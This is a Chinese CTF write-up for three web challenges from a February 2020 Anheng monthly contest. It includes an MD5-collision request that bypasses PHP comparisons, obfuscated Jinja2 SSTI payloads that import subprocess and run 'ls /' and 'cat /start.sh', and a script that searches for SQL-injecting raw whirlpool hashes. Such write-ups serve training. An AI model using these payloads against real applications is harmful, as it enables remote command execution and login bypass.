安恒月赛20200226

2020-02-26

easy-hash

打开题目就是源码

 <?php
highlight_file(__FILE__);
error_reporting(0);
$val1 = @$_GET['val1'];
$val2 = @$_GET['val2'];
$val3 = @$_GET['val3'];
$val4 = @$_GET['val4'];
$val5 = (string)@$_POST['val5'];
$val6 = (string)@$_POST['val6'];
$val7 = (string)@$_POST['val7'];
if( $val1 == $val2 ){
    die('val1 OR val2 no no no');
}
if( md5($val1) != md5($val2) ){
    die('step 1 fail');
}
if( $val3 == $val4 ){
    die('val3 OR val4 no no no');
}
if ( md5($val3) !== md5($val4)){
    die('step 2 fail');
}
if( $val5 == $val6 || $val5 == $val7 || $val6 == $val7 ){
    die('val5 OR val6 OR val7 no no no');
}
if (md5($val5) !== md5($val6) || md5($val6) !== md5($val7) || md5($val5) !== md5($val7)){
    die('step 3 fail');
}

if(!($_POST['a']) and !($_POST['b']))
{
    echo "come on!";
    die();
}
$a = $_POST['a'];
$b = $_POST['b'];
$m = $_GET['m'];
$n = $_GET['n'];

if (!(ctype_alnum($a)) || (strlen($a) > 5)  || !(ctype_alnum($b)) || (strlen($b) > 6))    ////判断是否是字母和数字或字母数字的组合
{
    echo "a OR b fail!";
    die();
}

if ((strlen($m) > 1) || (strlen($n) > 1))
{
    echo "m OR n fail";
    die();
}

$val8 = md5($a);
$val9 = strtr(md5($b), $m, $n);  //将MD5后包含$m的内容替换为$n

echo PHP_EOL;
echo "<p>val8 : $val8</p>";
echo PHP_EOL;
echo "<p>val9 : $val9</p>";
echo PHP_EOL;
if (($val8 == $val9) && !($a === $b) && (strlen($b) === 5))
{
    echo "nice,good job,give you flag:";
    echo file_get_contents('/var/www/html/flag.php');
} val1 OR val2 no no no

显然的MD5碰撞

生成的四组不同字符相同MD5

%CD%D1%2D%CB%2E%94%AE%DA%88%88%E7%24%13%47%D7%3D%5D%EC%36%5B%B7%15%2C%3A%18%9E%82%61%CC%C4%A5%40%E5%CB%AE%DA%7C%25%3E%6C%EB%41%BF%B3%D4%51%9D%47%A8%BC%D4%39%F7%77%86%CE%00%DB%AA%87%23%89%70%E6%4E%A9%00%91%90%46%10%25%17%56%0E%51%2F%1E%DE%51%A6%DF%43%2E%01%66%2E%2A%C9%1A%F6%46%EC%47%E2%EB%30%64%46%19%06%59%DB%FD%7A%88%70%AF%C3%3C%09%ED%54%08%96%F2%6F%29%F5%70%55%C6%7A%22%89%61%D3%85%96%89%B2%64%E5%3A%AD%95%DA%EA%7B%9D%17%7F%5B%E1%B9%23%2C%A7%23%54%CF%82%42%16%39%8A%28%20%B0%27%6D%CB%1A%EB%42%8D%EA%F2%4B%DE%B7%1C%0A%00%F6%90%19%6A%C9%F9%DB%F6%CD%49%FC%BF%D7%4F%CA%E8%A0%FF%0C%40%89%BD%0F%FC%80%0E%E3%0E%D2%C4%CB%E2%95%E4%8B%B8%2B%38%09%BE%7A%3D%FE%AC%F2%96%CC%3A%3D%BE%95%27%7F%F4%41%B1%19%A6%3A%A7%15%6A%9B%34%7E%FE%E4%90%AE%88%74%C3%13%65%DE%D5%7B%76%95%5C%28%8A

%CD%D1%2D%CB%2E%94%AE%DA%88%88%E7%24%13%47%D7%3D%5D%EC%36%5B%B7%15%2C%3A%18%9E%82%61%CC%C4%A5%40%E5%CB%AE%DA%7C%25%3E%6C%EB%41%BF%B3%D4%51%9D%47%A8%BC%D4%39%F7%77%86%CE%00%DB%AA%87%23%89%70%E6%4E%A9%00%91%90%46%10%25%17%56%0E%51%2F%1E%DE%51%A6%DF%43%2E%01%66%2E%2A%C9%1A%F6%46%EC%47%E2%EB%30%64%46%19%06%59%DB%FD%7A%88%70%AF%C3%3C%09%ED%54%08%96%F2%6F%29%F5%70%55%C6%7A%22%89%61%D3%85%96%89%B2%64%E5%3A%AD%95%DA%EA%7B%9D%17%7F%5B%E1%B9%23%2C%27%23%54%CF%82%42%16%39%8A%28%20%B0%27%6D%CB%1A%EB%42%8D%EA%F2%4B%DE%B7%1C%0A%80%F6%90%19%6A%C9%F9%DB%F6%CD%49%FC%BF%D7%CF%CA%E8%A0%FF%0C%40%89%BD%0F%FC%80%0E%E3%0E%D2%C4%CB%E2%95%E4%8B%B8%2B%B8%09%BE%7A%3D%FE%AC%F2%96%CC%3A%3D%BE%95%27%7F%F4%41%B1%19%A6%3A%A7%15%6A%9B%B4%7D%FE%E4%90%AE%88%74%C3%13%65%DE%D5%7B%F6%95%5C%28%8A

%CD%D1%2D%CB%2E%94%AE%DA%88%88%E7%24%13%47%D7%3D%5D%EC%36%DB%B7%15%2C%3A%18%9E%82%61%CC%C4%A5%40%E5%CB%AE%DA%7C%25%3E%6C%EB%41%BF%B3%D4%D1%9D%47%A8%BC%D4%39%F7%77%86%CE%00%DB%AA%07%23%89%70%E6%4E%A9%00%91%90%46%10%25%17%56%0E%51%2F%1E%DE%51%A6%DF%43%AE%01%66%2E%2A%C9%1A%F6%46%EC%47%E2%EB%30%64%46%19%06%59%DB%FD%7A%88%70%AF%C3%BC%08%ED%54%08%96%F2%6F%29%F5%70%55%C6%7A%A2%89%61%D3%85%96%89%B2%64%E5%3A%AD%95%DA%EA%7B%9D%17%7F%5B%E1%B9%23%2C%A7%23%54%CF%82%42%16%39%8A%28%20%B0%27%6D%CB%1A%EB%42%8D%EA%F2%4B%DE%B7%1C%0A%00%F6%90%19%6A%C9%F9%DB%F6%CD%49%FC%BF%D7%4F%CA%E8%A0%FF%0C%40%89%BD%0F%FC%80%0E%E3%0E%D2%C4%CB%E2%95%E4%8B%B8%2B%38%09%BE%7A%3D%FE%AC%F2%96%CC%3A%3D%BE%95%27%7F%F4%41%B1%19%A6%3A%A7%15%6A%9B%34%7E%FE%E4%90%AE%88%74%C3%13%65%DE%D5%7B%76%95%5C%28%8A

%CD%D1%2D%CB%2E%94%AE%DA%88%88%E7%24%13%47%D7%3D%5D%EC%36%DB%B7%15%2C%3A%18%9E%82%61%CC%C4%A5%40%E5%CB%AE%DA%7C%25%3E%6C%EB%41%BF%B3%D4%D1%9D%47%A8%BC%D4%39%F7%77%86%CE%00%DB%AA%07%23%89%70%E6%4E%A9%00%91%90%46%10%25%17%56%0E%51%2F%1E%DE%51%A6%DF%43%AE%01%66%2E%2A%C9%1A%F6%46%EC%47%E2%EB%30%64%46%19%06%59%DB%FD%7A%88%70%AF%C3%BC%08%ED%54%08%96%F2%6F%29%F5%70%55%C6%7A%A2%89%61%D3%85%96%89%B2%64%E5%3A%AD%95%DA%EA%7B%9D%17%7F%5B%E1%B9%23%2C%27%23%54%CF%82%42%16%39%8A%28%20%B0%27%6D%CB%1A%EB%42%8D%EA%F2%4B%DE%B7%1C%0A%80%F6%90%19%6A%C9%F9%DB%F6%CD%49%FC%BF%D7%CF%CA%E8%A0%FF%0C%40%89%BD%0F%FC%80%0E%E3%0E%D2%C4%CB%E2%95%E4%8B%B8%2B%B8%09%BE%7A%3D%FE%AC%F2%96%CC%3A%3D%BE%95%27%7F%F4%41%B1%19%A6%3A%A7%15%6A%9B%B4%7D%FE%E4%90%AE%88%74%C3%13%65%DE%D5%7B%F6%95%5C%28%8A

发包

POST /?val1=s878926199a&val2=s155964671a&val3=%31%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%5C%2E%E1%FB%93%0D%11%1A%69%A3%1E%0E%DA%12%47%BE%01%A2%DD%1A%B8%7C%72%E2%19%C6%3F%7A%88%BF%0C%40%51%F1%F1%CA%80%24%1E%6A%8F%C8%CD%F4%07%6E%D0%AA%A3%6D%42%80%6A%C9%7C%AB%C7%79%99%09%7E%A6%F6%CC%31%B9%65%20%36%B3%65%15%2D%77%50%FA%C1%8B%FC%86%D8%27%E5%96%20%7D%A1%1E%DD%5B%14%C5%5C%19%5D%32%75%29%57%E2%5C%DC%61%31%71%6F%B0%0F%8A%F5%51%0A%0D%12%97%E5%5E%21%0A%16%EF%95%3E%E0%C1%24%A3%03&val4=%31%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%5C%2E%E1%FB%93%0D%11%1A%69%A3%1E%0E%DA%12%47%BE%01%A2%DD%9A%B8%7C%72%E2%19%C6%3F%7A%88%BF%0C%40%51%F1%F1%CA%80%24%1E%6A%8F%C8%CD%F4%07%EE%CF%AA%A3%6D%42%80%6A%C9%7C%AB%C7%79%99%89%7E%A6%F6%CC%31%B9%65%20%36%B3%65%15%2D%77%50%FA%C1%8B%FC%86%D8%27%E5%16%20%7D%A1%1E%DD%5B%14%C5%5C%19%5D%32%75%29%57%E2%5C%DC%61%31%71%6F%B0%0F%8A%75%52%0A%0D%12%97%E5%5E%21%0A%16%EF%95%3E%60%C1%24%A3%03&m=a&n=1 HTTP/1.1
Host: 183.129.189.60:10004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2337
Origin: http://183.129.189.60:10004
Connection: close
Referer: http://183.129.189.60:10004/?val1=s878926199a&val2=s155964671a&val3=%31%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%5C%2E%E1%FB%93%0D%11%1A%69%A3%1E%0E%DA%12%47%BE%01%A2%DD%1A%B8%7C%72%E2%19%C6%3F%7A%88%BF%0C%40%51%F1%F1%CA%80%24%1E%6A%8F%C8%CD%F4%07%6E%D0%AA%A3%6D%42%80%6A%C9%7C%AB%C7%79%99%09%7E%A6%F6%CC%31%B9%65%20%36%B3%65%15%2D%77%50%FA%C1%8B%FC%86%D8%27%E5%96%20%7D%A1%1E%DD%5B%14%C5%5C%19%5D%32%75%29%57%E2%5C%DC%61%31%71%6F%B0%0F%8A%F5%51%0A%0D%12%97%E5%5E%21%0A%16%EF%95%3E%E0%C1%24%A3%03&val4=%31%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%5C%2E%E1%FB%93%0D%11%1A%69%A3%1E%0E%DA%12%47%BE%01%A2%DD%9A%B8%7C%72%E2%19%C6%3F%7A%88%BF%0C%40%51%F1%F1%CA%80%24%1E%6A%8F%C8%CD%F4%07%EE%CF%AA%A3%6D%42%80%6A%C9%7C%AB%C7%79%99%89%7E%A6%F6%CC%31%B9%65%20%36%B3%65%15%2D%77%50%FA%C1%8B%FC%86%D8%27%E5%16%20%7D%A1%1E%DD%5B%14%C5%5C%19%5D%32%75%29%57%E2%5C%DC%61%31%71%6F%B0%0F%8A%75%52%0A%0D%12%97%E5%5E%21%0A%16%EF%95%3E%60%C1%24%A3%03&val5=%7A%40%F4%BF%DD%6F%8D%AD%CC%94%E7%9C%3F%0E%F7%8E%AD%4B%5D%12%FF%DB%38%3C%52%6E%43%79%4B%8C%BE%CD%76%F3%F2%EC%C0%47%EB%F4%6B%FC%E3%DA%FF%7B%F9%8F%DA%DC%35%88%80%05%E6%6C%25%3E%47%CA%84%8C%DF%B6%9A%27%6A%0E%95%52%01%D1%57%E9%7F%2F%C5%75%CB%0E%DA%2D%7D%9D%2F%E6%2D%61%D3%1A%76%B7%EC%46%FE%E7%4E%7D%46%59%F4%4F%E0%8F%7A%5E%5D%EF%C0%2C%15%EB%2A%10%1B%D6%8B%1C%16%D2%F8%8E%93%C3%0F%93%72%5C&val6=%39%98%EB%F3%ED%EC%0F%45%C0%89%DD%13%77%E0%88%34%41%BF%20%0B%2B%1B%D8%D0%40%5A%7A%6E%52%92%AF%C8%5B%FD%E4%F5%E2%2A%EA%FC%CB%25%63%59%98%7B%78%54%24%A1%35%20%A5%2A%D6%22%35%04%B2%74%01%03%9E%F7%08%01%88%BA%03%88%01%09%65%96%5D%D2%A6%A2%3B%FF%AF%97%3D%88%50%1C%13%DA%49%B3%20%00%3A%60%88%E7%D7%B3%28%58%AF%04%6C%FC%F5%FE%0D%93%42%70%00%BD%EA%CE%D1%14%B4%B1%8E%47%8D%AD%2E%E5%2D%64%1D%3A&val7=%7A%40%F4%BF%DD%6F%8D%AD%CC%94%E7%9C%3F%0E%F7%8E%AD%4B%5D%92%FF%DB%38%3C%52%6E%43%79%4B%8C%BE%CD%76%F3%F2%EC%C0%47%EB%F4%6B%FC%E3%DA%FF%FB%F8%8F%DA%DC%35%88%80%05%E6%6C%25%3E%47%4A%84%8C%DF%B6%9A%27%6A%0E%95%52%01%D1%57%E9%7F%2F%C5%75%CB%0E%DA%2D%7D%1D%2F%E6%2D%61%D3%1A%76%B7%EC%46%FE%E7%4E%7D%46%59%F4%4F%E0%8F%7A%5E%5D%EF%C0%AC%15%EB%2A%10%1B%D6%8B%1C%16%D2%F8%8E%93%43%0F%93%72%5C&m[]=8c8d357b5e872bbacd45197626bd5759&n[]=523af537946b79c4f8369ed39ba78605
Upgrade-Insecure-Requests: 1

val5=%CD%D1%2D%CB%2E%94%AE%DA%88%88%E7%24%13%47%D7%3D%5D%EC%36%5B%B7%15%2C%3A%18%9E%82%61%CC%C4%A5%40%E5%CB%AE%DA%7C%25%3E%6C%EB%41%BF%B3%D4%51%9D%47%A8%BC%D4%39%F7%77%86%CE%00%DB%AA%87%23%89%70%E6%4E%A9%00%91%90%46%10%25%17%56%0E%51%2F%1E%DE%51%A6%DF%43%2E%01%66%2E%2A%C9%1A%F6%46%EC%47%E2%EB%30%64%46%19%06%59%DB%FD%7A%88%70%AF%C3%3C%09%ED%54%08%96%F2%6F%29%F5%70%55%C6%7A%22%89%61%D3%85%96%89%B2%64%E5%3A%AD%95%DA%EA%7B%9D%17%7F%5B%E1%B9%23%2C%A7%23%54%CF%82%42%16%39%8A%28%20%B0%27%6D%CB%1A%EB%42%8D%EA%F2%4B%DE%B7%1C%0A%00%F6%90%19%6A%C9%F9%DB%F6%CD%49%FC%BF%D7%4F%CA%E8%A0%FF%0C%40%89%BD%0F%FC%80%0E%E3%0E%D2%C4%CB%E2%95%E4%8B%B8%2B%38%09%BE%7A%3D%FE%AC%F2%96%CC%3A%3D%BE%95%27%7F%F4%41%B1%19%A6%3A%A7%15%6A%9B%34%7E%FE%E4%90%AE%88%74%C3%13%65%DE%D5%7B%76%95%5C%28%8A&val6=%CD%D1%2D%CB%2E%94%AE%DA%88%88%E7%24%13%47%D7%3D%5D%EC%36%5B%B7%15%2C%3A%18%9E%82%61%CC%C4%A5%40%E5%CB%AE%DA%7C%25%3E%6C%EB%41%BF%B3%D4%51%9D%47%A8%BC%D4%39%F7%77%86%CE%00%DB%AA%87%23%89%70%E6%4E%A9%00%91%90%46%10%25%17%56%0E%51%2F%1E%DE%51%A6%DF%43%2E%01%66%2E%2A%C9%1A%F6%46%EC%47%E2%EB%30%64%46%19%06%59%DB%FD%7A%88%70%AF%C3%3C%09%ED%54%08%96%F2%6F%29%F5%70%55%C6%7A%22%89%61%D3%85%96%89%B2%64%E5%3A%AD%95%DA%EA%7B%9D%17%7F%5B%E1%B9%23%2C%27%23%54%CF%82%42%16%39%8A%28%20%B0%27%6D%CB%1A%EB%42%8D%EA%F2%4B%DE%B7%1C%0A%80%F6%90%19%6A%C9%F9%DB%F6%CD%49%FC%BF%D7%CF%CA%E8%A0%FF%0C%40%89%BD%0F%FC%80%0E%E3%0E%D2%C4%CB%E2%95%E4%8B%B8%2B%B8%09%BE%7A%3D%FE%AC%F2%96%CC%3A%3D%BE%95%27%7F%F4%41%B1%19%A6%3A%A7%15%6A%9B%B4%7D%FE%E4%90%AE%88%74%C3%13%65%DE%D5%7B%F6%95%5C%28%8A&val7=%CD%D1%2D%CB%2E%94%AE%DA%88%88%E7%24%13%47%D7%3D%5D%EC%36%DB%B7%15%2C%3A%18%9E%82%61%CC%C4%A5%40%E5%CB%AE%DA%7C%25%3E%6C%EB%41%BF%B3%D4%D1%9D%47%A8%BC%D4%39%F7%77%86%CE%00%DB%AA%07%23%89%70%E6%4E%A9%00%91%90%46%10%25%17%56%0E%51%2F%1E%DE%51%A6%DF%43%AE%01%66%2E%2A%C9%1A%F6%46%EC%47%E2%EB%30%64%46%19%06%59%DB%FD%7A%88%70%AF%C3%BC%08%ED%54%08%96%F2%6F%29%F5%70%55%C6%7A%A2%89%61%D3%85%96%89%B2%64%E5%3A%AD%95%DA%EA%7B%9D%17%7F%5B%E1%B9%23%2C%A7%23%54%CF%82%42%16%39%8A%28%20%B0%27%6D%CB%1A%EB%42%8D%EA%F2%4B%DE%B7%1C%0A%00%F6%90%19%6A%C9%F9%DB%F6%CD%49%FC%BF%D7%4F%CA%E8%A0%FF%0C%40%89%BD%0F%FC%80%0E%E3%0E%D2%C4%CB%E2%95%E4%8B%B8%2B%38%09%BE%7A%3D%FE%AC%F2%96%CC%3A%3D%BE%95%27%7F%F4%41%B1%19%A6%3A%A7%15%6A%9B%34%7E%FE%E4%90%AE%88%74%C3%13%65%DE%D5%7B%76%95%5C%28%8A&a=byGcY&b=aOtm2

即可拿到flag

参考链接

easyflask1

给出提示，应该是ssti

在404页面注入

经过测试过滤了-,.。

参考链接https://fireshellsecurity.team/asisctf-fort-knox

操作

1	''.__class__.__mro__[1].__subclasses__()['''找到warnings.catch_warnings'''].__init__.__globals__['__builtins__']['__import__']('subprocess').check_output('ls')

114师傅的payload

##payload不需要这么长，可以连续格式化字符串，也可以只把_和.用格式化字符串替代
#没找到flag，先看目录，发现start.sh可读
{{''['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](99)+'{0:c}'['format'](108)+'{0:c}'['format'](97)+'{0:c}'['format'](115)+'{0:c}'['format'](115)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]['mro']()[1]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](115)+'{0:c}'['format'](117)+'{0:c}'['format'](98)+'{0:c}'['format'](99)+'{0:c}'['format'](108)+'{0:c}'['format'](97)+'{0:c}'['format'](115)+'{0:c}'['format'](115)+'{0:c}'['format'](101)+'{0:c}'['format'](115)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]()[65]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](105)+'{0:c}'['format'](110)+'{0:c}'['format'](105)+'{0:c}'['format'](116)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](103)+'{0:c}'['format'](108)+'{0:c}'['format'](111)+'{0:c}'['format'](98)+'{0:c}'['format'](97)+'{0:c}'['format'](108)+'{0:c}'['format'](115)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](98)+'{0:c}'['format'](117)+'{0:c}'['format'](105)+'{0:c}'['format'](108)+'{0:c}'['format'](116)+'{0:c}'['format'](105)+'{0:c}'['format'](110)+'{0:c}'['format'](115)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](105)+'{0:c}'['format'](109)+'{0:c}'['format'](112)+'{0:c}'['format'](111)+'{0:c}'['format'](114)+'{0:c}'['format'](116)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]('subprocess')['check'+'{0:c}'['format'](95)+'output'](['ls','/'])}}
#读取start.sh中存在sed -i "s/1ad0633b78d14695b04f105c14674b0d4/$1/g" /flag\n
{{''['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](99)+'{0:c}'['format'](108)+'{0:c}'['format'](97)+'{0:c}'['format'](115)+'{0:c}'['format'](115)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]['mro']()[1]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](115)+'{0:c}'['format'](117)+'{0:c}'['format'](98)+'{0:c}'['format'](99)+'{0:c}'['format'](108)+'{0:c}'['format'](97)+'{0:c}'['format'](115)+'{0:c}'['format'](115)+'{0:c}'['format'](101)+'{0:c}'['format'](115)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]()[231]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](105)+'{0:c}'['format'](110)+'{0:c}'['format'](105)+'{0:c}'['format'](116)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](103)+'{0:c}'['format'](108)+'{0:c}'['format'](111)+'{0:c}'['format'](98)+'{0:c}'['format'](97)+'{0:c}'['format'](108)+'{0:c}'['format'](115)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](98)+'{0:c}'['format'](117)+'{0:c}'['format'](105)+'{0:c}'['format'](108)+'{0:c}'['format'](116)+'{0:c}'['format'](105)+'{0:c}'['format'](110)+'{0:c}'['format'](115)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]['{0:c}'['format'](95)+'{0:c}'['format'](95)+'{0:c}'['format'](105)+'{0:c}'['format'](109)+'{0:c}'['format'](112)+'{0:c}'['format'](111)+'{0:c}'['format'](114)+'{0:c}'['format'](116)+'{0:c}'['format'](95)+'{0:c}'['format'](95)]('subprocess')['check'+'{0:c}'['format'](95)+'output'](['cat','/start'+'{0:c}'['format'](46)+'sh'])}}

HashIsTrue

给了提示

1	注意如下题目内容：$pw = hash("whirlpool",$pass,true); $sql = "select * from user where username='$user' and password='$pw'";

hash(“whirlpool”,$pass,true)当hash函数开启true时，会返回字符串，而不是16进制。

可以制造MD5后的包含‘= ’ (没有想通)

编写脚本参考着114师傅

<?php
for($i=0;;$i++)
{
    $pass=$i;
    $pw = hash("whirlpool",$pass,true);
    if(preg_match('/\'=\'/',$pw ))
    {
        echo $i;
        echo urldecode('%09');
        echo $pw;
        echo urldecode('%0a');
    }
}
?>